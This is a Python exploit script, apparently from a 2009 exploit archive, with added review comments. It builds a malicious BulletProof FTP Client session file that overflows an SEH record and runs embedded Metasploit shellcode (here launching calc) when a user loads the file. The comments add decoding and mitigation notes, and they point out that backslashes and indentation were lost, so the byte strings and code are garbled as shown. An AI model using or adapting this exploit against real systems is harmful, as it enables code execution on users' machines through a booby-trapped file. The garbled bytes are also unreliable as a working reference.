# Title : BulletProof FTP Client 2009 (.bps) Buffer Overflow Exploit (SEH)
# Published : 2009-04-13
# Author : His0k4
#!/usr/bin/python
#[*] Bug : BulletProof FTP Client 2009 (.bps) Buffer Overflow Exploit (SEH)
#[*] Credits : Stack
#[*] Tested on : Xp sp2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings : All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com
#[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D
#[*] translate by Cyb3r-1st: esse7 embe7 embou :D
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
# Proof-of-concept generator: builds a BulletProof FTP Client session file
# (.bps) whose second field is far longer than the banner line before it,
# then writes it to "sploit.bps" in the current directory.
#
# NOTE(review): every byte string below reads "xNN" instead of "\xNN", and the
# print message contains "n" where "\n" would be expected. The backslashes
# were presumably lost when the page was extracted; as shown, these are plain
# text characters, not raw bytes, and the try/except body has lost its
# indentation, so the listing does not parse as-is.
#
# Payload blob. The comment above it labels this as Metasploit win32_exec with
# CMD=calc and Size=160; the ten lines hold 160 "xNN" groups, which matches.
shellcode=(
"x33xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x71"
"x4fxd8x8dx83xebxfcxe2xf4x8dxa7x9cx8dx71x4fx53xc8"
"x4dxc4xa4x88x09x4ex37x06x3ex57x53xd2x51x4ex33xc4"
"xfax7bx53x8cx9fx7ex18x14xddxcbx18xf9x76x8ex12x80"
"x70x8dx33x79x4ax1bxfcx89x04xaax53xd2x55x4ex33xeb"
"xfax43x93x06x2ex53xd9x66xfax53x53x8cx9axc6x84xa9"
"x75x8cxe9x4dx15xc4x98xbdxf4x8fxa0x81xfax0fxd4x06"
"x01x53x75x06x19x47x33x84xfaxcfx68x8dx71x4fx53xe5"
"x4dx10xe9x7bx11x19x51x75xf2x8fxa3xddx19xbfx52x89"
"x2ex27x40x73xfbx41x8fx72x96x2cxb9xe1x12x4fxd8x8d")
# Read as hex, this is the ASCII banner "This is a BulletProof FTP Client
# Session-File and should not be modified directly." followed by CR LF.
# It is written first in the generated file.
header1=(
"x54x68x69x73x20x69x73x20x61x20x42x75x6cx6cx65x74"
"x50x72x6fx6fx66x20x46x54x50x20x43x6cx69x65x6ex74"
"x20x53x65x73x73x69x6fx6ex2dx46x69x6cx65x20x61x6e"
"x64x20x73x68x6fx75x6cx64x20x6ex6fx74x20x62x65x20"
"x6dx6fx64x69x66x69x65x64x20x64x69x72x65x63x74x6c"
"x79x2ex0dx0a")
# The oversized field: a host-like string, 68 filler units, two 4-byte values,
# then the payload. Per the title this targets an SEH record, so the two
# 4-byte values presumably land on the record's next-pointer and handler
# fields -- TODO confirm against the vulnerable parser.
# Defender's view: a .bps file whose line after the banner is much longer than
# any hostname and carries non-printable bytes is the indicator to look for;
# the underlying defect is a field copied without a length check.
exploit = "passwords.hotmail.com"
exploit += "x90"*68
exploit += "x74x06x90x90" #oplaa!
# Hard-coded address; the author's note places it in oleacc.dll on XP SP2.
# Reliance on a fixed module address is what ASLR removes, and handler
# validation (SafeSEH / SEHOP) is the mitigation aimed at this overwrite class.
exploit += "x98x6AxBFx74" #oleacc.dll (xp sp2)
exploit += shellcode
# Trailing fields of the session file. Read as hex: LF "21" CRLF, "ABABC" CRLF,
# "bphgqdnbjjgaeb" CRLF, "c:\" CRLF, "/" CRLF. "21" looks like the FTP port and
# the last two like local/remote paths -- presumably; the format is not shown.
header2=(
"x0ax32x31x0dx0ax41x42x41x42x43x0dx0ax62x70x68x67x71"
"x64x6ex62x6ax6ax67x61x65x62x0dx0ax63x3ax5cx0dx0a"
"x2fx0dx0a")
# Final file content: banner, oversized field, remaining fields.
vuln = header1 + exploit + header2
# Write the file. Python 2 syntax (print statement). The bare except hides the
# actual failure reason and prints only "Error!".
try:
out_file = open("sploit.bps",'w')
out_file.write(vuln)
out_file.close()
# Per this message, the overflow is reached when the user loads the file via
# File > Load BP Session and clicks Connect, i.e. it needs user interaction
# with an attacker-supplied file.
print "nSession file created!nnNow Go to: file>Load BP Session then chose it and clic Connectn"
except:
print "Error!"